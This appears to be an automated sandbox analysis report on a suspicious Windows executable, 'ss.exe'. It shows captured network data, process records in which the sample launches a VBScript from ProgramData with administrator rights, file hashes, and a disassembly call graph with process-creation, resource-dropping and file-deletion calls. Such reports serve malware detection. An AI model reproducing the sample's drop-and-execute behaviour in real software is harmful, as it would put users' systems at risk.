Apr 3, 2018 13:56:00.171987057 CEST5INData Raw: 20 5b 5d 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 41 63 63 6f 75 6e 74 27 2c 20 27 55 41 2d 33 30 30 39 39 39 35 31 2d 31 27 5d 29 3b 0a 20 20 5f 67 61 71 2e 70 75 73 68 28 5b 27 5f 73 65 74 44 6f 6d 61 69 6e 4e 61 6d 65 27 2c
Data Ascii: []; _gaq.push(['_setAccount', 'UA-30099951-1']); _gaq.push(['_setDomainName', 'none']); _gaq.push(['_setAllowLinker', true]); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'tex
Apr 3, 2018 13:56:00.172004938 CEST6INData Raw: 20 7b 0a 20 20 20 20 20 20 20 20 64 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 20 66 29 3b 0a 20 20 20 20 7d 20 65 6c 73 65 20 7b 20 66 28 29 3b 20 7d 0a 7d 29 28 64 6f 63 75 6d
Data Ascii: { d.addEventListener("DOMContentLoaded", f); } else { f(); }})(document, window, "yandex_metrika_callbacks");</script><noscript><div><img src="//mc.yandex.ru/watch/14153041" style="position:absolute; left:-9999px;" alt="" /></d
Apr 3, 2018 13:56:00.172102928 CEST7INData Raw: 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 63 6f 6c 22 3e 0a 3c 68 34 3e 41 62 6f 75 74 20 75 43 6f 7a 3c 2f 68 34 3e 0a 3c
Data Ascii: ter"> <div class="content"><div class="footer-col"><h4>About uCoz</h4><ul><li><a href="http://www.ucoz.com/tour/">About</a></li> <li><a href="http://top.ucoz.com/" target="_blank">Top Sites</a></li><li><a href="http://www.ucoz.com
Apr 3, 2018 13:56:00.270538092 CEST7INData Raw: 6c 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: l>0


Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

General

Start time:13:55:23
Start date:21/05/2016
Path:C:\Users\user\Desktop\ss.exe
Wow64 process (32bit):false
Commandline:'C:\Users\user\Desktop\ss.exe'
Imagebase:0x400000
File size:336896 bytes
MD5 hash:B83E77AE26E3663301648318E38EC1B2
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low

General

Start time:13:56:10
Start date:21/05/2016
Path:C:\Windows\System32\wscript.exe
Wow64 process (32bit):false
Commandline:'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'
Imagebase:0xfd0000
File size:141824 bytes
MD5 hash:979D74799EA6C8B8167869A68DF5204A
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Code Analysis

Reset < >

    Execution Graph

    Execution Coverage:1.2%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:14%
    Total number of Nodes:1245
    Total number of Limit Nodes:31

    Graph

    execution_graph 117432 4149b0 117433 414bcd setSBCS 117432->117433 117439 468a20 117433->117439 117436 414be5 117438 414c0e OleInitialize 117436->117438 117449 415a90 117436->117449 117440 468a46 117439->117440 117441 468a2f 117439->117441 117440->117436 117441->117440 117470 484959 117441->117470 117443 468a56 117448 468adb 117443->117448 117478 486a00 117443->117478 117446 468a89 117446->117436 117448->117436 117450 415aae 117449->117450 117454 415ada MessageBoxA IsWindow 117450->117454 117457 415b1c 117450->117457 117451 415cc5 117452 415d10 2 API calls 117451->117452 117453 415cd2 117451->117453 117456 415d03 117452->117456 117453->117438 117455 415b08 DestroyWindow 117454->117455 117454->117457 117455->117457 117457->117451 117459 415b66 _strncpy 117457->117459 117496 401000 17 API calls 117457->117496 117497 415720 LoadImageA Shell_NotifyIcon 117459->117497 117461 415bd0 117462 415be4 SetCurrentDirectoryA 117461->117462 117463 415bef 117461->117463 117462->117463 117465 415c1f 117463->117465 117498 401210 131 API calls 117463->117498 117464 415c7d 117469 415c9a 117464->117469 117500 415d10 117464->117500 117465->117464 117499 46d170 SetCurrentDirectoryA 117465->117499 117469->117438 117474 484967 __getbuf 117470->117474 117475 4849c0 __getbuf __chsize_nolock 117470->117475 117472 484995 RtlAllocateHeap 117472->117474 117472->117475 117474->117472 117474->117475 117486 48953d 10 API calls __getbuf 117474->117486 117487 484a18 117474->117487 117490 48938e 10 API calls 4 library calls 117474->117490 117475->117443 117479 486a0a __getbuf 117478->117479 117480 484959 __getbuf 14 API calls 117479->117480 117481 468a82 117479->117481 117482 486a26 std::exception::exception 117479->117482 117480->117479 117481->117446 117485 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117481->117485 117484 486a64 std::bad_alloc::bad_alloc 117482->117484 117495 48535d 22 API calls 117482->117495 117485->117448 117486->117474 117491 4849ed GetModuleHandleW 117487->117491 117490->117474 117492 484a16 ExitProcess 117491->117492 117493 484a01 GetProcAddress 117491->117493 117493->117492 117494 484a11 117493->117494 117494->117492 117495->117484 117496->117459 117497->117461 117498->117465 117499->117464 117501 415e13 IsWindow 117500->117501 117504 415d24 117500->117504 117502 415e23 DestroyWindow 117501->117502 117503 415e37 117501->117503 117502->117503 117504->117501 117377 427eeb 117406 420630 117377->117406 117379 423fd4 GetTickCount 117382 423ff2 PeekMessageA 117379->117382 117400 423fa0 __alldiv 117379->117400 117380 423fb0 GlobalUnWire 117381 423fc2 CloseClipboard 117380->117381 117381->117379 117383 424018 GetTickCount 117382->117383 117384 42400c 117382->117384 117383->117400 117385 424015 117384->117385 117385->117383 117386 4240c7 GetTickCount 117394 4240f2 117386->117394 117386->117400 117387 42455d 117389 409310 25 API calls 117389->117400 117391 423f40 131 API calls 117391->117394 117392 485791 26 API calls 117392->117400 117393 471830 25 API calls 117393->117400 117394->117391 117394->117400 117395 412c30 42 API calls 117395->117400 117398 412b30 32 API calls 117398->117400 117399 412b00 27 API calls 117399->117400 117400->117379 117400->117380 117400->117381 117400->117386 117400->117387 117400->117389 117400->117392 117400->117393 117400->117394 117400->117395 117400->117398 117400->117399 117402 401000 17 API calls 117400->117402 117403 424f8a GetSystemTimeAsFileTime FileTimeToLocalFileTime 117400->117403 117418 401210 131 API calls 117400->117418 117419 43aca0 91 API calls 117400->117419 117420 4740e0 32 API calls 117400->117420 117421 473e50 18 API calls 117400->117421 117422 471410 29 API calls 117400->117422 117423 4716a0 62 API calls 117400->117423 117424 471750 34 API calls __alldiv 117400->117424 117402->117400 117403->117400 117407 42063a 117406->117407 117416 420641 117406->117416 117407->117400 117410 4206d4 117430 485d31 27 API calls 117410->117430 117411 4206c4 117429 48659b 27 API calls 117411->117429 117414 4206da 117414->117400 117415 4206ce 117415->117400 117417 4206a6 117416->117417 117425 40cdf0 117416->117425 117417->117400 117418->117400 117419->117400 117420->117400 117421->117400 117422->117400 117423->117400 117424->117400 117426 40cdf7 117425->117426 117426->117425 117427 40ce05 117426->117427 117431 485ec9 25 API calls __isxdigit_l 117426->117431 117427->117410 117427->117411 117429->117415 117430->117414 117431->117427 117626 48d652 SetUnhandledExceptionFilter 117505 426109 117536 471d20 117505->117536 117507 426118 117549 42e250 117507->117549 117509 423fd4 GetTickCount 117512 423ff2 PeekMessageA 117509->117512 117533 423fa0 __alldiv 117509->117533 117510 423fb0 GlobalUnWire 117511 423fc2 CloseClipboard 117510->117511 117511->117509 117513 424018 GetTickCount 117512->117513 117514 42400c 117512->117514 117513->117533 117515 424015 117514->117515 117515->117513 117516 4240c7 GetTickCount 117523 4240f2 117516->117523 117516->117533 117519 42455d 117520 423f40 131 API calls 117520->117523 117521 412c30 42 API calls 117521->117533 117522 471830 25 API calls 117522->117533 117523->117520 117523->117533 117524 409310 25 API calls 117524->117533 117526 485791 26 API calls 117526->117533 117528 412b00 27 API calls 117528->117533 117530 412b30 32 API calls 117530->117533 117531 401000 17 API calls 117531->117533 117532 424f8a GetSystemTimeAsFileTime FileTimeToLocalFileTime 117532->117533 117533->117509 117533->117510 117533->117511 117533->117516 117533->117519 117533->117521 117533->117522 117533->117523 117533->117524 117533->117526 117533->117528 117533->117530 117533->117531 117533->117532 117591 401210 131 API calls 117533->117591 117592 43aca0 91 API calls 117533->117592 117593 4740e0 32 API calls 117533->117593 117594 473e50 18 API calls 117533->117594 117595 471410 29 API calls 117533->117595 117596 4716a0 62 API calls 117533->117596 117597 471750 34 API calls __alldiv 117533->117597 117537 471d3d 117536->117537 117539 471d45 117536->117539 117598 485cde 25 API calls __ismbcspace_l 117537->117598 117540 471f87 117539->117540 117543 471d73 117539->117543 117599 485cde 25 API calls __ismbcspace_l 117539->117599 117540->117507 117542 471f7d 117542->117507 117543->117542 117545 471db7 117543->117545 117600 485cde 25 API calls __ismbcspace_l 117543->117600 117545->117540 117548 471de5 117545->117548 117601 485cde 25 API calls __ismbcspace_l 117545->117601 117547 485cde 25 API calls 117547->117548 117548->117540 117548->117542 117548->117547 117550 42e270 setSBCS 117549->117550 117551 42e42a 117550->117551 117552 42e63c setSBCS 117550->117552 117558 42e4dc 117550->117558 117602 414360 25 API calls 117550->117602 117551->117533 117553 42e831 117552->117553 117571 42e67d 117552->117571 117605 414360 25 API calls 117552->117605 117554 42e84a FormatMessageA 117553->117554 117580 42e86e 117553->117580 117554->117580 117557 42e7ae ShellExecuteEx 117559 42e7c8 117557->117559 117560 42e829 GetLastError 117557->117560 117561 42e539 117558->117561 117603 484cd8 60 API calls 3 library calls 117558->117603 117562 42e7d1 GetModuleHandleA GetProcAddress 117559->117562 117563 42e7f6 117559->117563 117560->117553 117561->117561 117564 42e5a2 CreateProcessA 117561->117564 117565 42e560 117561->117565 117562->117563 117576 42e81d 117563->117576 117577 42e5d6 117563->117577 117567 42e62b GetLastError 117564->117567 117568 42e5c8 117564->117568 117604 44ef00 8 API calls 2 library calls 117565->117604 117567->117552 117570 42e5cf CloseHandle 117568->117570 117568->117577 117570->117577 117571->117557 117572 42e6df 117571->117572 117606 485791 117571->117606 117578 42e719 117572->117578 117579 42e712 SetCurrentDirectoryA 117572->117579 117583 42e6e6 117572->117583 117573 42e58b 117573->117552 117574 42e593 117573->117574 117573->117577 117574->117533 117576->117560 117577->117551 117581 42e610 CloseHandle 117577->117581 117582 485791 26 API calls 117578->117582 117579->117578 117580->117533 117581->117551 117587 42e724 117582->117587 117583->117557 117584 42e7a3 SetCurrentDirectoryA 117584->117557 117585 42e774 GetFileAttributesA 117589 42e77f 117585->117589 117590 42e794 117585->117590 117586 485791 26 API calls 117586->117587 117587->117585 117587->117586 117588 471d20 25 API calls 117587->117588 117587->117590 117588->117587 117589->117587 117590->117557 117590->117584 117591->117533 117592->117533 117593->117533 117594->117533 117595->117533 117596->117533 117597->117533 117598->117539 117599->117543 117600->117545 117601->117548 117602->117558 117603->117561 117604->117573 117605->117571 117609 4856e1 117606->117609 117608 4857a3 117608->117572 117614 484523 117609->117614 117611 4856f5 __chsize_nolock 117613 48570e 117611->117613 117622 4891b6 GetCurrentProcess TerminateProcess __mbsnbicmp_l 117611->117622 117613->117608 117615 484536 117614->117615 117621 484583 117614->117621 117623 488a22 __amsg_exit 117615->117623 117617 48453b 117619 484563 117617->117619 117624 4887f9 21 API calls 3 library calls 117617->117624 117619->117621 117625 488078 7 API calls 4 library calls 117619->117625 117621->117611 117622->117613 117623->117617 117624->117619 117625->117621 117627 45684e 117687 456703 __alldiv __chsize_nolock 117627->117687 117628 474a50 17 API calls 117628->117687 117630 4582e3 117634 45830a 117630->117634 117646 456952 117630->117646 117659 45831e 117630->117659 117631 404080 15 API calls 117631->117687 117633 473fd0 18 API calls 117633->117687 117722 473fd0 18 API calls 117634->117722 117635 458414 117642 458456 117635->117642 117644 458458 117635->117644 117645 45843c 117635->117645 117636 456a9c GetEnvironmentVariableA 117636->117687 117637 4585c7 117637->117646 117729 44d3a0 32 API calls 117637->117729 117638 44d5b0 42 API calls 117638->117687 117640 45681e GetEnvironmentVariableA 117640->117687 117642->117646 117656 484959 __getbuf 14 API calls 117642->117656 117650 45845c 117644->117650 117651 45846f 117644->117651 117723 413080 17 API calls 117645->117723 117677 458368 117646->117677 117728 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117646->117728 117647 484959 14 API calls __getbuf 117647->117687 117648 44d830 17 API calls 117648->117687 117724 401000 17 API calls 117650->117724 117726 413080 17 API calls 117651->117726 117674 4584dc 117656->117674 117658 458461 117725 413080 17 API calls 117658->117725 117659->117635 117659->117637 117659->117646 117659->117677 117660 44d780 32 API calls 117660->117687 117662 45821c 117662->117646 117718 474f80 HeapFree GetLastError __freebuf 117662->117718 117664 457b01 lstrcmpi 117664->117687 117665 457bcd lstrcmpi 117665->117687 117666 457b70 lstrcmpi 117666->117687 117667 457cc0 lstrcmpi 117667->117687 117668 413080 17 API calls 117668->117687 117669 457c1e lstrcmpi 117669->117687 117670 457c6f lstrcmpi 117670->117687 117673 474f80 HeapFree GetLastError 117673->117687 117674->117646 117727 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117674->117727 117675 44d490 49 API calls 117675->117687 117676 44d6f0 27 API calls 117676->117687 117678 458250 117678->117662 117719 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117678->117719 117680 474ce0 17 API calls 117680->117687 117682 458262 117682->117646 117720 474f80 HeapFree GetLastError __freebuf 117682->117720 117683 474d60 HeapFree GetLastError RtlSizeHeap GetCurrentProcess TerminateProcess 117683->117687 117685 45829d 117685->117646 117721 474f80 HeapFree GetLastError __freebuf 117685->117721 117687->117628 117687->117630 117687->117631 117687->117633 117687->117635 117687->117636 117687->117638 117687->117640 117687->117646 117687->117647 117687->117648 117687->117660 117687->117662 117687->117664 117687->117665 117687->117666 117687->117667 117687->117668 117687->117669 117687->117670 117687->117673 117687->117675 117687->117676 117687->117678 117687->117680 117687->117682 117687->117683 117687->117685 117688 401000 17 API calls 117687->117688 117689 4588b0 117687->117689 117712 420db0 44 API calls 2 library calls 117687->117712 117713 44da40 68 API calls 117687->117713 117714 48669d 32 API calls 117687->117714 117715 485ec9 25 API calls __isxdigit_l 117687->117715 117716 48659b 27 API calls 117687->117716 117717 485d31 27 API calls 117687->117717 117688->117687 117702 4588d9 117689->117702 117704 458962 117689->117704 117690 4589f9 117730 46d6b0 117690->117730 117692 458a14 117692->117687 117693 458bf7 117694 458c71 117693->117694 117698 458c0d 117693->117698 117743 46a6b0 22 API calls __getbuf 117693->117743 117746 423f40 131 API calls __alldiv 117694->117746 117703 458c21 117698->117703 117706 458c4e 117698->117706 117707 458c61 117698->117707 117699 458a9a 117699->117687 117700 458ca6 117700->117692 117741 493552 15 API calls 5 library calls 117702->117741 117703->117687 117704->117690 117704->117699 117705 458a44 117704->117705 117705->117693 117705->117699 117710 473fd0 18 API calls 117705->117710 117742 413210 27 API calls 117705->117742 117744 46b7d0 19 API calls 117706->117744 117745 4749b0 HeapFree GetLastError __freebuf 117707->117745 117710->117705 117712->117687 117713->117687 117714->117687 117715->117687 117716->117687 117717->117687 117718->117646 117719->117662 117720->117646 117721->117646 117722->117646 117723->117642 117724->117658 117725->117642 117726->117642 117727->117646 117728->117646 117729->117646 117731 46d6e5 117730->117731 117732 46d76a 117731->117732 117734 46d71c 117731->117734 117774 46d2b0 161 API calls 117732->117774 117747 455180 117734->117747 117735 46d786 117737 46d749 117735->117737 117775 44d830 117735->117775 117737->117692 117738 46d7b6 117738->117737 117780 46d2b0 161 API calls 117738->117780 117741->117704 117742->117705 117743->117698 117744->117707 117745->117694 117746->117700 117748 4551be 117747->117748 117754 4551db 117747->117754 117749 455206 117748->117749 117748->117754 117784 454c70 26 API calls 117749->117784 117750 455596 117751 45559d 117750->117751 117752 455234 117750->117752 117788 4555f0 99 API calls 117751->117788 117789 454d50 64 API calls 2 library calls 117752->117789 117754->117750 117754->117752 117756 4551f4 117754->117756 117758 45525c 117754->117758 117756->117737 117759 44d830 17 API calls 117758->117759 117763 455265 117758->117763 117760 45529a 117759->117760 117781 44eb00 117760->117781 117765 455405 117763->117765 117785 454940 27 API calls 117763->117785 117764 45550f 117786 454d50 64 API calls 2 library calls 117764->117786 117768 455508 117765->117768 117770 4554f5 SysFreeString 117765->117770 117767 455531 117767->117756 117787 454470 25 API calls 117767->117787 117768->117764 117768->117767 117770->117765 117772 45530b SysAllocString 117773 455329 SysFreeString 117772->117773 117773->117763 117774->117735 117776 44d849 117775->117776 117777 44d873 117775->117777 117776->117777 117820 401000 17 API calls 117776->117820 117777->117738 117779 44d892 117779->117738 117780->117737 117790 46ef40 117781->117790 117783 44eb3a 117783->117763 117783->117772 117784->117756 117785->117763 117786->117756 117787->117756 117788->117756 117789->117756 117791 46ef4c 117790->117791 117794 46ef51 117790->117794 117791->117783 117792 46ef86 MultiByteToWideChar 117793 46efa6 117792->117793 117797 46f005 117792->117797 117804 44ea00 117793->117804 117794->117792 117796 46ef6f 117794->117796 117815 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117794->117815 117796->117792 117797->117783 117798 46efac 117816 44e890 19 API calls 2 library calls 117798->117816 117801 46efb9 MultiByteToWideChar 117802 46efdb 117801->117802 117802->117797 117817 44e7e0 19 API calls __freebuf 117802->117817 117805 44ea0f 117804->117805 117806 44ea41 117804->117806 117807 486a00 22 API calls 117805->117807 117808 486a00 22 API calls 117806->117808 117812 44ea9a 117806->117812 117810 44ea16 117807->117810 117809 44ea55 117808->117809 117813 44ea7d 117809->117813 117818 44e970 19 API calls 117809->117818 117810->117798 117812->117798 117813->117812 117819 4847b8 HeapFree GetLastError __tsopen_nolock __chsize_nolock 117813->117819 117815->117796 117816->117801 117817->117797 117818->117813 117819->117812 117820->117779 117821 484e6d 117822 484e7a 117821->117822 117827 48ac43 117822->117827 117825 48ac43 2 API calls 117826 484ead 117825->117826 117829 48ac4c 117827->117829 117830 484e94 117829->117830 117831 48ac6a Sleep 117829->117831 117833 48e9c3 117829->117833 117830->117825 117830->117826 117832 48ac7f 117831->117832 117832->117829 117832->117830 117834 48e9cf __getbuf 117833->117834 117835 48e9fd RtlAllocateHeap 117834->117835 117836 48e9db __chsize_nolock 117834->117836 117835->117834 117835->117836 117836->117829 117842 440630 117843 40cdf0 25 API calls 117842->117843 117844 440645 117843->117844 117845 440649 117844->117845 117846 440658 117844->117846 117875 486124 27 API calls 117845->117875 117876 485d10 27 API calls 117846->117876 117849 440653 117850 4406c6 CreateFileA 117849->117850 117866 452490 117849->117866 117851 44066f 117850->117851 117856 440714 117850->117856 117857 44067d 117851->117857 117877 42d230 22 API calls __freebuf 117851->117877 117853 44066b 117853->117850 117853->117851 117855 4406b9 117878 4870fe 26 API calls __mbsupr 117856->117878 117859 44074f FindResourceA 117860 440767 LoadResource 117859->117860 117861 4407a1 117859->117861 117860->117861 117863 440774 LockResource 117860->117863 117862 4407a3 CloseHandle 117861->117862 117864 4407c0 117862->117864 117863->117861 117865 440781 SizeofResource WriteFile 117863->117865 117865->117862 117867 485791 26 API calls 117866->117867 117869 45249e 117867->117869 117868 4524c8 FindFirstFileA 117871 4524d8 117868->117871 117872 4524e1 FindClose 117868->117872 117869->117868 117870 485791 26 API calls 117869->117870 117873 4524ad 117870->117873 117871->117853 117872->117853 117873->117868 117874 4524b4 GetFileAttributesA 117873->117874 117874->117853 117875->117849 117876->117849 117877->117855 117878->117859 117837 484c5b 117838 484c68 117837->117838 117839 484c61 117837->117839 117841 48964e RtlLeaveCriticalSection 117839->117841 117841->117838 117879 438550 117880 438565 RegisterClipboardFormatA 117879->117880 117890 43857c 117879->117890 117880->117890 117881 4385f8 117885 43874f 117881->117885 117886 4385fe 117881->117886 117882 438771 117883 43877d 117882->117883 117884 438c60 117882->117884 117888 438783 117883->117888 117898 438c17 117883->117898 117887 438c6c 117884->117887 117906 438d03 117884->117906 118011 439040 235 API calls 117885->118011 117892 43860a 117886->117892 117893 438bcf 117886->117893 117895 438c6e 117887->117895 117913 438ca7 117887->117913 117894 43878f 117888->117894 117911 438bbb 117888->117911 117889 4385bf 117890->117881 117890->117882 117890->117889 117900 43866c 117892->117900 117901 438618 117892->117901 117902 43870d 117892->117902 117903 4386a4 117892->117903 117904 438766 117892->117904 117905 4386cb 117892->117905 117915 438642 117892->117915 117919 4387b2 117892->117919 117896 438bf3 DefWindowProcA 117893->117896 118012 415720 LoadImageA Shell_NotifyIcon 117893->118012 117907 438795 117894->117907 117908 438b7f GetMenu CheckMenuItem 117894->117908 117895->117893 117909 438c7a PostMessageA 117895->117909 117897 43875b 117897->117896 117897->117904 117899 438c20 117898->117899 117910 438c38 SendMessageTimeoutA 117898->117910 117900->117896 117917 43867b 117900->117917 117901->117896 117918 438627 117901->117918 117902->117896 118010 46a120 DrawIconEx 117902->118010 117903->117896 117914 4386b3 SetFocus 117903->117914 117905->117896 118009 46a070 GetIconInfo GetObjectA DeleteObject DeleteObject 117905->118009 117906->117893 117906->117909 117920 438ea1 IsWindow 117906->117920 117921 438ec4 GetCurrentProcessId 117906->117921 117922 438ed3 117906->117922 117923 438e86 117906->117923 117924 438e6b 117906->117924 117925 438db0 117906->117925 117926 438e44 PostMessageA 117906->117926 117927 438d20 117906->117927 117940 438b4a 117907->117940 117956 4387a2 117907->117956 117908->117896 117965 4386f7 117908->117965 118013 403690 117909->118013 117910->117899 117911->117893 117911->117913 117911->117965 117912 438cb7 PostMessageA 117929 438cd6 117912->117929 117913->117912 117913->117929 117916 438661 117915->117916 117933 415a90 140 API calls 117915->117933 117930 438699 117917->117930 117949 415a90 140 API calls 117917->117949 117931 415a90 140 API calls 117918->117931 117939 4387c3 117919->117939 117976 438803 117919->117976 117937 438eb9 117920->117937 117938 438eaf GetWindowTextA 117920->117938 117922->117904 117952 438ee8 117922->117952 117941 415a90 140 API calls 117923->117941 117935 415a90 140 API calls 117924->117935 117928 438de5 GetCurrentProcessId EnumWindows 117925->117928 117945 438dc0 GlobalUnWire 117925->117945 117946 438dd3 CloseClipboard 117925->117946 117936 438e5d 117926->117936 117932 438d5a 117927->117932 117942 438d64 117927->117942 117951 438d35 117927->117951 117943 438e39 117928->117943 117944 438e0d 117928->117944 118022 476430 GetWindowThreadProcessId GetClassNameA 117928->118022 117947 438cf8 117929->117947 117948 438cdf SendMessageTimeoutA 117929->117948 117950 438637 117931->117950 117932->117896 117932->117942 117933->117916 117953 438e7b 117935->117953 117938->117937 117954 4387c8 ShowWindow 117939->117954 117955 4387db MoveWindow 117939->117955 117940->117896 117967 438b6c ShowWindow 117940->117967 117957 438e96 117941->117957 117958 438d6b PostMessageA 117942->117958 117959 438d8a 117942->117959 118020 475520 57 API calls 117944->118020 117945->117946 117946->117928 117948->117947 117949->117930 117951->117896 117963 438d3e 117951->117963 118021 42a650 23 API calls _strncpy 117952->118021 117956->117893 117956->117919 117956->117965 117968 438da5 117959->117968 117972 438d99 117959->117972 118018 469b70 32 API calls 117963->118018 117965->117896 117973 4386ff 117965->117973 117969 438e1e 117969->117943 117977 438e25 SetTimer 117969->117977 117971 438efb 118019 4392c0 129 API calls 2 library calls 117972->118019 117974 438d4f 117975 438c8c 117975->117973 117976->117896 117976->117965 117980 43888d 117976->117980 117981 438a34 117976->117981 117977->117943 117979 438da2 117979->117968 117983 43890a 117980->117983 117986 438892 117980->117986 117982 438a52 GetClientRect 117981->117982 117984 438b13 117981->117984 117987 438a74 117982->117987 117985 438a00 117983->117985 117989 438915 117983->117989 117985->117896 117988 438a0a GetClipBox FillRect 117985->117988 117986->117896 117990 4388b5 117986->117990 117993 4388b1 117986->117993 117991 438ade MoveWindow InvalidateRect 117987->117991 117994 438aba 117987->117994 117995 438aa7 MoveWindow 117987->117995 117996 438930 CreateCompatibleDC SelectObject BitBlt SelectObject DeleteDC 117989->117996 117997 438984 DrawIconEx 117989->117997 117992 4388cd SetBkColor 117990->117992 117991->117984 117998 4388df SetTextColor 117992->117998 117999 4388e7 117992->117999 117993->117990 118000 4388c5 GetSysColor 117993->118000 118001 438ad8 117994->118001 118002 438ac1 MoveWindow 117994->118002 117995->117994 118003 43899f ExcludeClipRect CreateRectRgn GetClipRgn 117996->118003 117997->118003 117998->117999 118004 4388f9 GetSysColorBrush 117999->118004 118005 4388ee 117999->118005 118000->117992 118001->117991 118002->118001 118006 4389da GetSysColorBrush 118003->118006 118007 4389d6 118003->118007 118008 4389e2 FillRgn DeleteObject 118006->118008 118007->118008 118009->117965 118010->117965 118011->117897 118012->117896 118014 4036e4 118013->118014 118015 403699 118013->118015 118014->117975 118015->118014 118016 4036c2 GetTickCount 118015->118016 118016->118014 118017 4036dd 118016->118017 118017->118014 118018->117974 118019->117979 118020->117969 118021->117971 118023 426f85 118052 4403a0 118023->118052 118025 423fd4 GetTickCount 118028 423ff2 PeekMessageA 118025->118028 118033 423fa0 __alldiv 118025->118033 118026 423fb0 GlobalUnWire 118027 423fc2 CloseClipboard 118026->118027 118027->118025 118029 424018 GetTickCount 118028->118029 118030 42400c 118028->118030 118029->118033 118031 424015 118030->118031 118031->118029 118032 4240c7 GetTickCount 118032->118033 118039 4240f2 118032->118039 118033->118025 118033->118026 118033->118027 118033->118032 118034 42455d 118033->118034 118036 409310 25 API calls 118033->118036 118033->118039 118040 485791 26 API calls 118033->118040 118041 471830 25 API calls 118033->118041 118043 412c30 42 API calls 118033->118043 118045 412b30 32 API calls 118033->118045 118046 412b00 27 API calls 118033->118046 118048 401000 17 API calls 118033->118048 118049 424f8a GetSystemTimeAsFileTime FileTimeToLocalFileTime 118033->118049 118076 401210 131 API calls 118033->118076 118077 43aca0 91 API calls 118033->118077 118078 4740e0 32 API calls 118033->118078 118079 473e50 18 API calls 118033->118079 118080 471410 29 API calls 118033->118080 118081 4716a0 62 API calls 118033->118081 118082 471750 34 API calls __alldiv 118033->118082 118036->118033 118038 423f40 131 API calls 118038->118039 118039->118033 118039->118038 118040->118033 118041->118033 118043->118033 118045->118033 118046->118033 118048->118033 118049->118033 118053 4403bb 118052->118053 118054 440409 118052->118054 118055 4403cf 118053->118055 118083 42d230 22 API calls __freebuf 118053->118083 118057 440456 118054->118057 118058 440419 SetLastError DeleteFileA GetLastError 118054->118058 118055->118033 118057->118053 118061 44049e FindFirstFileA 118057->118061 118060 44044d 118058->118060 118059 440400 118059->118033 118060->118033 118062 4404ba GetLastError 118061->118062 118063 4404e5 118061->118063 118064 4404d7 118062->118064 118084 48699a 26 API calls 118063->118084 118064->118033 118066 440506 118067 440546 GetTickCount 118066->118067 118069 44057b GetTickCount 118066->118069 118070 4405ec FindNextFileA 118066->118070 118074 4405ca DeleteFileA 118066->118074 118067->118066 118068 44055c PeekMessageA 118067->118068 118068->118066 118068->118069 118069->118066 118070->118067 118071 440607 FindClose 118070->118071 118085 42d3e0 22 API calls __itow 118071->118085 118073 440620 118073->118033 118074->118070 118075 4405d9 GetLastError 118074->118075 118075->118066 118076->118033 118077->118033 118078->118033 118079->118033 118080->118033 118081->118033 118082->118033 118083->118059 118084->118066 118085->118073 118086 402373 118087 402386 118086->118087 118088 4023c3 118087->118088 118089 402781 118087->118089 118090 402571 118088->118090 118091 4023ca 118088->118091 118092 4026b7 118088->118092 118115 4024a8 118089->118115 118196 472c50 GetWindowRect 118089->118196 118194 472c50 GetWindowRect 118090->118194 118100 402474 SendMessageA 118091->118100 118105 402413 118091->118105 118106 402495 118091->118106 118094 402720 118092->118094 118095 40270c MulDiv 118092->118095 118092->118115 118103 402757 MulDiv 118094->118103 118094->118115 118095->118094 118096 402594 GetWindowLongA SetWindowLongA 118195 45c3b0 24 API calls 118096->118195 118100->118106 118101 402881 setSBCS 118107 402895 SendMessageA 118101->118107 118102 4029c1 118117 402b32 118102->118117 118119 402aa5 118102->118119 118121 402adb 118102->118121 118103->118115 118105->118106 118108 40241a 118105->118108 118193 472c50 GetWindowRect 118106->118193 118107->118102 118116 4028cf 118107->118116 118109 402420 SendMessageA 118108->118109 118110 402433 ScreenToClient SendMessageA 118108->118110 118109->118106 118110->118106 118111 4025d1 118112 402646 MulDiv 118111->118112 118113 402657 118111->118113 118112->118113 118114 40268d MulDiv 118113->118114 118113->118115 118114->118115 118115->118101 118115->118102 118197 403860 HeapFree GetLastError __freebuf 118116->118197 118201 45c1d0 HeapFree GetLastError __freebuf 118117->118201 118119->118117 118123 402ac4 118119->118123 118121->118117 118122 402b00 DragFinish GetWindowLongA SetWindowLongA 118121->118122 118122->118117 118199 463400 ShowWindow 118123->118199 118124 401469 GetTickCount 118168 401481 _strncpy 118124->118168 118126 402acd 118200 45c1d0 HeapFree GetLastError __freebuf 118126->118200 118127 402930 118130 402967 118127->118130 118198 401000 17 API calls 118127->118198 118130->118102 118131 403690 GetTickCount 118132 40149e GetMessageA 118131->118132 118132->118124 118133 4014c1 GetTickCount 118132->118133 118133->118168 118134 40155b GetFocus 118134->118168 118135 401ceb GetForegroundWindow 118136 401cfb GetWindowThreadProcessId 118135->118136 118135->118168 118143 401d10 GetClassNameA 118136->118143 118136->118168 118137 401b7b ShowWindow 118137->118124 118138 415a90 140 API calls 118138->118168 118140 402d33 TranslateAccelerator 118140->118124 118141 402d4d TranslateMessage DispatchMessageA 118140->118141 118141->118168 118143->118168 118144 401ac0 IsDialogMessage 118144->118168 118149 401d3e IsDialogMessage 118149->118168 118151 401d71 SetCurrentDirectoryA 118151->118168 118152 40159a TranslateAccelerator 118152->118124 118152->118168 118153 401ea3 DragQueryFile 118153->118168 118154 401c5c 118155 401ec2 DragFinish 118155->118124 118156 4021f5 DragFinish 118156->118124 118157 4012b0 GetDlgCtrlID GetParent GetDlgCtrlID 118157->118168 118158 4021c4 